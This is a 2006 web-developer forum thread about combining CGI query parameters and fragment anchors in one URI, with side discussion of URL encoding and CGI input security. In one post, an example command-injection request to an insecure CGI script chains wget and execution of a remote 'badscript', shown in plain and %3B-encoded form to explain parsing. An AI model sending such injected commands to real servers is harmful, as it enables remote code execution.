Bytes | Developer Community

specifying anchors and cgi parameters in a single URI

Hi,

I need some advice on URIs.

In a dynamic (Perl-driven) page we list a number of items presented in
a hierarchical tree structure. Within that page is a form which allows
you to search for items containing various strings (trying to get the
users to *remember* CTRL+F was proving fruitless). The results are then
presented at the top of the page with links to relative anchor
references (<a href="#foo">). When clicked, these would take you to
that item in the hierarchical tree.

The problem is that the URI of the page itself contains CGI parameters
( e.g. http://www.foo.com/script.cgi?p=1&r=2 ) and these are carried
over to the URIs containing the anchors ( e.g.
http://www.foo.com/script.cgi?p=1&r=2#foo ).

These URIs containing parameters and anchors work in IE (6 and below)
but not in Mozilla, Firefox, Konqueror or Opera. Any ideas on what I can
do to enable the same functionality cross-browser?

regards
Crimperman
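A minimal sketch of how a relative href="#foo" is resolved against a page URI that already carries CGI parameters, using Python's `urllib.parse.urljoin` as a stand-in for the browser's resolver (an assumption; browsers follow the same RFC 3986 resolution rules). The query string is kept and only the fragment is appended, so the combined URI is itself well-formed:

```python
from urllib.parse import urljoin, urlsplit

page = "http://www.foo.com/script.cgi?p=1&r=2"

# A fragment-only reference keeps the base path and query and adds a fragment.
target = urljoin(page, "#foo")
print(target)

parts = urlsplit(target)
print(parts.query)     # the CGI parameters are still there
print(parts.fragment)  # the anchor name the browser should scroll to
```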

Feb 24 '06 #1

A number of URI characters must be encoded, one of which is "#".
Use "%23" for it. Google "URI encoding" for more detail.

If you don't know about this already,
you _may_ also have written your script in a way that
crackers can get into easily.

Google for "Perl detainting" and "Perl CGI security" and such.
Be sure to use CGI.pm instead of your own CGI interface; it
has many security checks built in that you may not have thought
about.
--
mbstevens
http://www.mbstevens.com/

Feb 24 '06 #2
mbstevens wrote:
A number of URI characters must be encoded, one of which is "#".
Use "%23" for it. Google "URI encoding" for more detail.
This creates two problems. An href of "%23foo" (and *only* that) is not
passed by the browser as a local anchor; it is instead passed as
http://www.foo.com/#foo .
Giving the entire URI in the link to the anchor
(http://www.foo.com/script.cgi?p=1&r=2%23foo ) ends up with the browser
passing 2%23foo as the value of the last parameter.
Encoding the # as an HTML character reference (&#35;) just gives the same
result as using a plain # character.
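A minimal sketch of both behaviours described above, again with Python's `urllib.parse` standing in for the browser (an assumption; a browser's address bar may display the resolved URI decoded). A bare "%23foo" is a relative path that replaces `script.cgi` and drops the query string, while "%23" inside the query string is just data:

```python
from urllib.parse import urljoin, urlsplit, parse_qs

page = "http://www.foo.com/script.cgi?p=1&r=2"

# "%23foo" is a relative *path*, not a fragment: it replaces "script.cgi"
# and the query string of the page is not carried over.
relative = urljoin(page, "%23foo")
print(relative)

# Inside the query string, %23 is data: there is no fragment, and the
# last parameter's value becomes "2#foo" once decoded.
encoded = "http://www.foo.com/script.cgi?p=1&r=2%23foo"
print(repr(urlsplit(encoded).fragment))
print(parse_qs(urlsplit(encoded).query))
```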
If you don't know about this already,
you _may_ also have written your script in a way that
crackers can get into easily.


I did know about it (the other relevant characters are encoded), but in
this case the script is not on a public-facing site, and I don't use
this kind of script on any of the public-facing ones. Thanks, though.

Crimperman

Feb 24 '06 #3
Crimperman wrote:
The problem is that the URI of the page itself contains CGI parameters
( e.g. http://www.foo.com/script.cgi?p=1&r=2 ) and these are carried
over to the URIs containing the anchors ( e.g.
http://www.foo.com/script.cgi?p=1&r=2#foo ).

These URIs containing parameters and anchors work in IE (6 and below)
but not in Mozilla, Firefox, Konqueror or Opera. Any ideas on what I can
do to enable the same functionality cross-browser?


They should just work everywhere. What does your link target look like? <a
name="#foo">...</a> is a common mistake (there shouldn't be a # character
in the name).
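A minimal sketch of the matching step, under the simplifying assumption that a fragment matches a target only when it equals an `id`, or the `name` of an `a` element, character for character (IE's more lenient behaviour is not modelled). The class and the helper `fragment_found` are hypothetical and use Python's standard `html.parser`:

```python
from html.parser import HTMLParser


class AnchorCollector(HTMLParser):
    """Collect fragment targets: any id=, plus name= on <a> elements."""

    def __init__(self):
        super().__init__()
        self.targets = set()

    def handle_starttag(self, tag, attrs):
        for key, value in attrs:
            if value is None:
                continue
            if key == "id" or (tag == "a" and key == "name"):
                self.targets.add(value)


def fragment_found(html_text, fragment):
    """Return True if the fragment names a target in the document."""
    collector = AnchorCollector()
    collector.feed(html_text)
    collector.close()
    return fragment in collector.targets


broken = '<a name="#foo"></a>'  # the "#" becomes part of the name
fixed = '<a name="foo"></a>'    # the name is just "foo"

print(fragment_found(broken, "foo"))
print(fragment_found(fixed, "foo"))
```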

--
David Dorward <http://blog.dorward.me.uk/> <http://dorward.me.uk/>
Home is where the ~/.bashrc is
Feb 24 '06 #4
mbstevens wrote:
A number of URI characters must be encoded, one of which is "#".
Use "%23" for it. Google "URI encoding" for more detail.


That is because the # character has special meaning in URLs, so if you want
to pass that character to the server you have to encode it. In this case
the OP *wants* the special meaning, so URL Encoding it would not be the way
to go.
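A minimal sketch of the distinction, using Python's `urllib.parse` (the parameter `q` and its value are hypothetical): data that contains "#" is percent-encoded by `urlencode`, while the "#" that introduces the fragment is written literally and keeps its special meaning:

```python
from urllib.parse import urlencode, urlsplit, parse_qs

# Data that happens to contain "#" is percent-encoded by urlencode ...
query = urlencode({"p": 1, "q": "#define"})

# ... while the "#" that introduces the fragment is written literally.
url = "http://www.foo.com/script.cgi?" + query + "#foo"

parts = urlsplit(url)
print(query)
print(parts.fragment)
print(parse_qs(parts.query))
```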

--
David Dorward <http://blog.dorward.me.uk/> <http://dorward.me.uk/>
Home is where the ~/.bashrc is
Feb 24 '06 #5
Solved.

It turned out the targets were all coded incorrectly. They were all of
the form <a name="#foo"></a>, that is, with the hash mark included in
the name of the target!

Many thanks for the suggestions though.

Crimperman

Feb 24 '06 #6
David Dorward wrote:
mbstevens wrote:

A number of URI characters must be encoded, one of which is "#".
Use "%23" for it. Google "URI encoding" for more detail.

That is because the # character has special meaning in URLs, so if you want
to pass that character to the server you have to encode it. In this case
the OP *wants* the special meaning, so URL Encoding it would not be the way
to go.


You're usually spot on, so I may be misunderstanding your intention
here, but:

the CGI.pm module handles encoding and decoding transparently.
My reference claims that all data attached to the URI and sent
by the GET method should be encoded.

I'm thinking that perhaps some of his browsers are taking
care of the encoding for him, and some aren't.

At any rate, if the OP is not using CGI.pm, a simple
regex over the query string would fix him up, no?
--
mbstevens
http://www.mbstevens.com/

Feb 24 '06 #7
mbstevens wrote:
That is because the # character has special meaning in URLs
the CGI.pm module handles encoding and decoding transparently.


The = character also has special meaning, so I'll use it in this example:

http://www.example.com/foo?this=that%3Dsomething

When the query string gets parsed the "=" character will be treated as a
special character while the "%3D" will be decoded to an "=" - but this
latter one is not a special character (it was URL encoded) so it is treated
as data.

Thus:

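#!/usr/bin/perl
use strict;
use warnings;
use CGI;

my $q = CGI->new();
print $q->header;         # HTTP header: Content-Type and a blank line
print $q->param('this');  # the %3D has already been decoded to "="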

Will output:

that=something

It is for similar reasons that if you URL encode the "#" character (in the
example with the query string), it will be treated as just another bit
of data on the query string, and not as the special character that delimits
the URL from the fragment identifier.
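For comparison, a sketch of the same decoding rule using Python's `urllib.parse.parse_qs` in place of CGI.pm (a substitution; only the resulting values matter here). A literal "=" delimits key from value, while "%3D" is decoded to data, in keys as well as values:

```python
from urllib.parse import parse_qs

params = parse_qs("this=that%3Dsomething&x%3Dy=1")

# The raw "=" split each pair; the encoded ones survive as data.
print(params["this"])
print(params["x=y"])
```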

--
David Dorward <http://blog.dorward.me.uk/> <http://dorward.me.uk/>
Home is where the ~/.bashrc is
Feb 24 '06 #8
mbstevens wrote:

A number of URI characters must be encoded, one of which is "#".
Use "%23" for it. Google "URI encoding" for more detail.

If you don't know about this already,
you _may_ also have written your script in a way that
crackers can get into easily.

Google for "Perl detainting" and "Perl CGI security" and such.


Google returns nothing for "perl detainting", and Perl CGI security is
too broad considering you haven't given any details as to the nature of
the breach. Can you give us something more specific?
Feb 24 '06 #9
David Dorward wrote:
They should just work everywhere. What does your link target look like? <a
name="#foo">...</a> is a common mistake (there shouldn't be a # character
in the name).


AND it works in IE, so that would be consistent with the OP's observation.
Feb 24 '06 #10
Crimperman wrote:
The problem is that the URI of the page itself contains CGI parameters
( e.g. http://www.foo.com/script.cgi?p=1&r=2 ) and these are carried
over to the URIs containing the anchors ( e.g.
http://www.foo.com/script.cgi?p=1&r=2#foo ).


In addition to what others have written, the ampersands in your
parameter strings should be written as &amp; in the HTML source,
though practically speaking that rarely matters.
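A minimal sketch using Python's `html.escape`, assuming the URI is being written into an `href` attribute by a generator script. Only the HTML layer changes: an HTML parser decodes `&amp;` back to `&`, so the browser still sees the original URI:

```python
import html

href = "http://www.foo.com/script.cgi?p=1&r=2#foo"

# In an HTML attribute, a bare "&" starts a character reference, so escape it.
attr = html.escape(href, quote=True)
print('<a href="%s">foo</a>' % attr)

# Decoding the attribute value gives back exactly the URI we started with.
print(html.unescape(attr) == href)
```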
Feb 24 '06 #11
On Fri, 24 Feb 2006, Harlan Messinger wrote:
Google returns nothing for "perl detainting", and Perl CGI security
is too broad considering you haven't given any details as to the
nature of the breach. Can you give us something more specific?


CGI security is a broad topic, and hardly appropriate for going into
detail on an HTML-specific group.

The general principle is always to treat values supplied from outside
as suspicious, and subject them to appropriate filtering before
allowing them to do anything significant.

In Perl there is a -T option, which will raise an alert if unfiltered
outside data (so-called "tainted data") is allowed to get close to a
system function. The data has to be untainted before being used in
such a context.
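Python has no equivalent of Perl's -T switch, so the following is only a sketch of the untainting habit, not of taint tracking: accept an outside value only if it matches an allow-list pattern describing what you expect, and reject everything else. The pattern `ITEM_ID` and the helper `untaint` are hypothetical:

```python
import re

# Hypothetical allow-list: the shape we expect an item identifier to have.
ITEM_ID = re.compile(r"[A-Za-z0-9_-]{1,32}")


def untaint(value, pattern=ITEM_ID):
    """Return value only if the whole string matches pattern, else raise.

    Mirrors the Perl idiom of untainting via a regex match, but nothing in
    Python forces callers to use it; that discipline is up to the script.
    """
    if not pattern.fullmatch(value):
        raise ValueError("rejected input: %r" % (value,))
    return value


print(untaint("item_42"))
try:
    untaint("../../etc/passwd")
except ValueError as err:
    print(err)
```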

One needs in general to take a similar line with user-supplied data to
a CGI script. But the -T option won't, in general, save you here.
Any number of scripts have allowed themselves to be fooled into
behaving as an open spam relay, or permitting spammers to advertise
their products on bulletin boards, weblogs and whatnot. Yours could
well be next.
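One concrete case of the spam-relay abuse mentioned above, offered as an assumption about the kind of script at risk: a form-to-mail script that copies a form field into an e-mail header. A CR or LF in that field lets the sender start extra header lines (such as Bcc:). A minimal sketch of the filtering step; the helper name is hypothetical:

```python
def safe_header_value(value):
    """Reject a form value that would start a new mail header line.

    A CR or LF inside a Subject or From value would let the sender append
    headers such as Bcc:, which is one way form-to-mail scripts get abused.
    """
    if "\r" in value or "\n" in value:
        raise ValueError("line break in header value: %r" % (value,))
    return value


print(safe_header_value("Question about the tree view"))
try:
    safe_header_value("hello\r\nBcc: victim@example.com")
except ValueError as err:
    print("rejected:", err)
```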

For more details I'd recommend finding a more appropriate group -
preferably *after* having read Stein's web security FAQ and related
documentation.

--

Most folks would think a Referer header is something you smoke.
-- Bruce Tomlin in a.s.r
Feb 24 '06 #12
David Dorward wrote:
It is for similar reasons that if you URL encode the "#" character (in the
example with the query string), it will be treated as just another bit
of data on the query string, and not as the special character that delimits
the URL from the fragment identifier.

Ok, I can see that, but according to RFC 1738:
"The character '#' is unsafe and should always be encoded
because it is used in World Wide Web and in other
systems to delimit a URL from a fragment/anchor
identifier that might follow it."
http://www.faqs.org/rfcs/rfc1738.html

...which is basically as you have said, but it is the
security aspect that worries me.

Perhaps the script should
be passed a key=value pair whose key indicates that an
anchor or fragment is going to be used. Then it would be
easy enough to make the script smart enough to handle
the encoded character correctly. It would also be easy
enough to just let the caller skip the '#' character altogether,
whether encoded or not.


Feb 24 '06 #13
mbstevens wrote:
Ok, I can see that, but according to RFC 1738:
"The character '#' is unsafe and should always be encoded
because it is used in World Wide Web and in other
systems to delimit a URL from a fragment/anchor
identifier that might follow it."
http://www.faqs.org/rfcs/rfc1738.html
Which is why it can't be encoded: the OP _wants_ to delimit the URL from
the fragment identifier.
...which is basically as you have said, but it is the
security aspect that worries me.
What security aspect?
Perhaps the script should be passed a key=value pair whose key indicates
that an anchor or fragment is going to be used


The script doesn't care, though; only the user agent does. The browser strips
off the # and everything after it before requesting the URL from the
server. Then it looks for the fragment in the document that is returned and
scrolls to it.
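A minimal sketch of that client-side split, using Python's `urllib.parse.urldefrag`. The request line printed is a simplified HTTP/1.1 form for illustration, not a capture from any particular browser:

```python
from urllib.parse import urldefrag, urlsplit

url = "http://www.foo.com/script.cgi?p=1&r=2#foo"

# Split off the fragment; it stays with the user agent.
without_fragment, fragment = urldefrag(url)

# The request line carries only the path and the query string.
parts = urlsplit(without_fragment)
request_target = parts.path + ("?" + parts.query if parts.query else "")

print("GET " + request_target + " HTTP/1.1")
print("scroll to:", fragment)
```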

--
David Dorward <http://blog.dorward.me.uk/> <http://dorward.me.uk/>
Home is where the ~/.bashrc is
Feb 24 '06 #14
David Dorward wrote:
...which is basically as you have said, but it is the
security aspect that worries me.

What security aspect?

Crackers play naughty games with meta characters.
'>', ';', '|', and '..' are well known as
sources of CGI abuse. So, the receiving Perl program
has to be smart enough to deal with them when they come.

I don't have an example of CGI abuse using "#", and the people who wrote
the RFC could be wrong, but I tend to trust them about things like this.
Berners-Lee, Masinter and McCahill are the editors.

"All unsafe characters must always be encoded within a URL. For
example, the character "#" must be encoded within URLs even in
systems that do not normally deal with fragment or anchor
identifiers, so that if the URL is copied into another system that
does use them, it will not be necessary to change the URL encoding."

...from the previous source.

You might get away with passing the characters in to the Perl program
any way you want, I suppose, but the Perl program had better be smart
enough to interpret them correctly and in a way that won't lead to abuse
of the CGI program.


Feb 24 '06 #15
mbstevens <NO***********@xmbstevensx.com> writes:
David Dorward wrote:
...which is basically as you have said, but it is the
security aspect that worries me.
What security aspect?

Crackers play naughty games with meta characters.
'>', ';', '|', and '..' are well known as
sources of CGI abuse. So, the receiving Perl program
has to be smart enough to deal with them when they come.


True, but largely irrelevant to the URL encoding issue. '..', for
example, consists entirely of non-reserved characters that would never
be encoded, and the ';' exploits *rely* on it being encoded as the RFC
suggests so that the CGI script doesn't interpret it as a separator [1].

GET /cgi-bin/insecure.cgi?cmd=cd+/tmp;wget+URLOFbadscript;./badscript
is an entirely harmless request.

GET /cgi-bin/insecure.cgi?cmd=cd+/tmp%3Bwget+URLOFbadscript%3B./badscript
is a very dangerous request.

[1] This does depend on the language. CGI libraries are _recommended_
to treat ';' as a separator equivalent to '&', but not all of them do.
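The footnote's point can be checked with a small parser. This is a hypothetical CGI-style parser written for illustration that follows the recommendation to treat ';' like '&'. Python's own `parse_qs` has changed its handling of ';' between releases, so it is deliberately not used here:

```python
from urllib.parse import unquote_plus


def parse_query(qs):
    """Hypothetical parser: split on "&" and ";", then decode each part."""
    params = {}
    for pair in qs.replace(";", "&").split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


raw = "cmd=cd+/tmp;wget+URLOFbadscript;./badscript"
encoded = "cmd=cd+/tmp%3Bwget+URLOFbadscript%3B./badscript"

# Unencoded ";" acts as a separator, so cmd only receives "cd /tmp".
print(parse_query(raw)["cmd"])
# Encoded "%3B" is data, so the whole command chain reaches cmd.
print(parse_query(encoded)["cmd"])
```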
I don't have an example of CGI abuse using "#", and the people who
wrote the RFC could be wrong, but I tend to trust them about things
like this. Berners-Lee, Masinter and McCahill are the editors.

"All unsafe characters must always be encoded within a URL. For
example, the character "#" must be encoded within URLs even in
systems that do not normally deal with fragment or anchor
identifiers, so that if the URL is copied into another system that
does use them, it will not be necessary to change the URL encoding."

...from the previous source.
I think what this is talking about is not what you think it is talking
about:

You have the URL http://localhost/cgi-bin/script.pl?search=%23define

The current system (System A) this URL is being held in does not use
fragment identifiers, so it *could* translate this URL internally to
http://localhost/cgi-bin/script.pl?search=#define with no ill effects
to itself.

The quotation you mention says that it shouldn't do this, however, in
case it needs to pass the URL to a second system (System B) that does
use fragment identifiers. If it has kept the # encoded as %23, then
System B will recognise it as part of the query string part of the
URL. If it does not keep it encoded, then System B will incorrectly
assume that it is the separator between the query string "search=" and
the fragment identifier "define".
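The System A / System B scenario can be reproduced with Python's `urllib.parse`, used here as a stand-in for whatever systems actually hold the URL: decoding %23 before passing the URL on turns part of the query string into a fragment.

```python
from urllib.parse import urlsplit, unquote

kept = "http://localhost/cgi-bin/script.pl?search=%23define"

# System A decodes the URL "harmlessly" before handing it on.
decoded = unquote(kept)

# System B splits each version into query and fragment.
for url in (kept, decoded):
    parts = urlsplit(url)
    print(repr(parts.query), repr(parts.fragment))
```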

You *could* make up a case where this was a security problem when the
unsafe character is '#', but in practice it's more likely to just be a
data integrity problem.

Anyway, this doesn't apply when # (or ? or =, which are also reserved
characters) is used _for_its_reserved_meaning_ in a URL as opposed to
being entered as an encoded literal character.
You might get away with passing the characters in to the Perl program
any way you want, I suppose, but the Perl program had better be smart
enough to interpret them correctly and in a way that won't lead to
abuse of the CGI program.


Well, in the event that the CGI program does do something silly upon
receiving an unencoded # in the QUERY_STRING part of the GET request,
it doesn't matter how *you* pass the character in, since someone else
can always send it differently.

--
Chris
Feb 24 '06 #16
mbstevens wrote:
What security aspect?
Crackers play naughty games with meta characters.
'>', ';', '|', and '..' are well known as
sources of CGI abuse. So, the receiving Perl program
has to be smart enough to deal with them when they come.
Yes - but those have special meaning when it comes to filesystems and/or SQL
and/or shell. Not URLs.
I don't have an example of CGI abuse using "#", and the people who wrote
the RFC could be wrong, but I tend to trust them about things like this.
Since the browser will strip the # and everything following it, that isn't
an issue. It will never get to the server side script.
Berners-Lee, Masinter and McCahill are the editors.

"All unsafe characters must always be encoded within a URL. For
example, the character "#" must be encoded within URLs even in
systems that do not normally deal with fragment or anchor
identifiers, so that if the URL is copied into another system that
does use them, it will not be necessary to change the URL encoding."


In other words: If you are using a URL on a system where "#" does not
indicate a separator between URL and fragment identifier, then encode it
anyway since another system might treat it as such a separator and thus
break.

I believe the term "unsafe" refers to the chance of it breaking, not
security implications.

--
David Dorward <http://blog.dorward.me.uk/> <http://dorward.me.uk/>
Home is where the ~/.bashrc is
Feb 25 '06 #17
David Dorward wrote:
In other words: If you are using a URL on a system where "#" does not
indicate a separator between URL and fragment identifier, then encode it
anyway since another system might treat it as such a separator and thus
break.

I believe the term "unsafe" refers to the chance of it breaking, not
security implications.

OK! Thanks for clearing that up.


Feb 25 '06 #18

